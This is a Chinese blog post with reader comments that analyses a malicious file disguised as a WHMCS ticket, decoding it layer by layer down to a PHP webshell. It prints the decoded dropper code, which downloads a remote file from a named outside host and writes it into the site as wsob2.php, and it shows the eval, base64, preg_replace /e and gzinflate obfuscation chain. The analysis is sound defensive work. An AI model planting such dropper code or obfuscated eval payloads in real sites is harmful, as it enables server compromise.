在某群收到了这样一个文件(1.txt) , 说是whmcs的一个ticket。
打开后发现是
{php}eval(base64_decode('...')){/php}
于是很明显的发现是要执行某段代码, 于是将这个代码改成了
<?php print(base64_decode('...')); ?>
运行之, 得文件1.php
<?php
$code = file_get_contents('http://tanzilfurqon.web.ugm.ac.id//templates/jj_pink_sunset/zz/jgndihapus.txt');
$fo = fopen("wsob2.php","w");
$fo2 = fopen("attachments/wsob2.php","w");
...
?>
一看就是要写文件, 于是访问http://tanzilfurqon.web.ugm.ac.id//templates/jj_pink_sunset/zz/jgndihapus.txt得到文件2.txt
发现内有
...
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'...''\x29\x29\x29\x3B",".");
...
代码, 改造之, 使其输出”\x65…\x3B”部分得2.php。
运行之, 得3.txt
eval(gzinflate(base64_decode('')))
加入<?php ?>, 将eval改为print, 得3.php, 运行之得4.txt, 发现其内容为一个webshell。
总结: 发现了一个gzdeflate/gzinflate可以用来压缩/解压php代码, 得到了一个php的webshell。
用到的文件如下
你还真有耐心去解那点windows-1252……
毫不了解windows-1252
我擦我怎么忘了php print…… :shock:
总之现在加/解密就那么点技巧。
另:迫于Dot TK将我的域名变为了收费域名,于是我把我的网站域名改为了samhjn.co.cc,希望能把pic.samhjn.tk改为pic.samhjn.co.cc,并修改友链地址。谢谢。
原来还会变成收费的!
因该是加/解码吧
已修改